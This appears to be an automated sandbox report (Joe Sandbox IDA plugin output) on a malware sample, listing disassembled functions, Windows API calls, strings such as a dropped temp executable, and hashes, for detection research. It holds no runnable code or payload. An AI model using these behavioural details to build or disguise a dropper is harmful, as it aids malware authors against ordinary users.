Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$HLA$HLA$ionAndSpinCount$uOA
API String ID: 4209647438-1493548530
Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00401751 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,ylpuxzibyo Setup,NSIS Error), ref: 00405BD4

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

Strings

C:\Users\user~1\AppData\Local\Temp, xrefs: 0040177E
"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" , xrefs: 0040176D, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $C:\Users\user~1\AppData\Local\Temp
API String ID: 1941528284-3367238698
Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405375 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
GetLastError.KERNEL32 ref: 004053CC
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
GetLastError.KERNEL32 ref: 004053EB

Strings

C:\Users\user\Desktop, xrefs: 00405375
\s@, xrefs: 0040537B
Ls@, xrefs: 004053AA

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop$Ls@$\s@
API String ID: 3449924974-621692704
Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
wsprintfA.USER32 ref: 00405F39
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D

Strings

%s%s.dll, xrefs: 00405F33
\, xrefs: 00405F11
UXTHEME, xrefs: 00405EF2

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD

Uniqueness

Uniqueness Score: -1.00%

Function 004058CD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004058E0
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA

Strings

nsa, xrefs: 004058D9
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058D0, 004058D4
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 004058CD

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3966375320
Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040575C
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user~1\AppData\Local\Temp, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user~1\AppData\Local\Temp
API String ID: 1892508949-3107243751
Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040579B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,ylpuxzibyo Setup,NSIS Error), ref: 00405BD4

Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040575C
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 004057EE
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 004057FE

Strings

C:\, xrefs: 004057A1, 004057A6, 004057AC, 004057E7, 004057ED, 004057F5, 004057FD

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 23b4c1e045f8e95cfcd418ff1664a298a1bdaee650c8a20779d7746134bd3734
Instruction ID: dbe731a3e552e7e8bf63b17cabef30e108f51aae268418cbcb714f920067e67f
Opcode Fuzzy Hash: 23b4c1e045f8e95cfcd418ff1664a298a1bdaee650c8a20779d7746134bd3734
Instruction Fuzzy Hash: 9FF0CD35105E5196D63233365C45A9F5A59CE46334F14053FF891B32D1DB3C8943ADBE

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4

Strings

ro, xrefs: 00401392

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: ro
API String ID: 3850602802-607515425
Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405427 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
CloseHandle.KERNEL32(?), ref: 00405459

Strings

Error launching installer, xrefs: 0040543A

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E38 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

Part of subcall function 00405427: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
Part of subcall function 00405427: CloseHandle.KERNEL32(?), ref: 00405459

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA7

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 75abc50d8bbcae5e6b42e16a9c5e18dcc4f34aedb3b9b3b6b4535c28acb83f60
Instruction ID: 8d0e1338582c57ad2e0f1769eab3c7df609e54171dd7408d793955ea23100c16
Opcode Fuzzy Hash: 75abc50d8bbcae5e6b42e16a9c5e18dcc4f34aedb3b9b3b6b4535c28acb83f60
Instruction Fuzzy Hash: 18015732D04105EBDF21AFA5D945AEE7AB1AF00344F50813BF905B51E1C7B85A819A9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405F57 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040589E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 004058A2
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00403540 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403366,00000020), ref: 0040354B

Strings

C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\, xrefs: 0040355F

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\
API String ID: 2962429428-3773954278
Opcode ID: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
Instruction ID: 2a7e143eeb5ff15eabc1b2b6f8d0cbcee59997853ce735810823953bb5f53fb5
Opcode Fuzzy Hash: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
Instruction Fuzzy Hash: D3C01230544600B6C2247F789E4F7193A186741337B900725F170B10F3D73C6A41552E

Uniqueness

Uniqueness Score: -1.00%

Function 0040587F Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405895

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
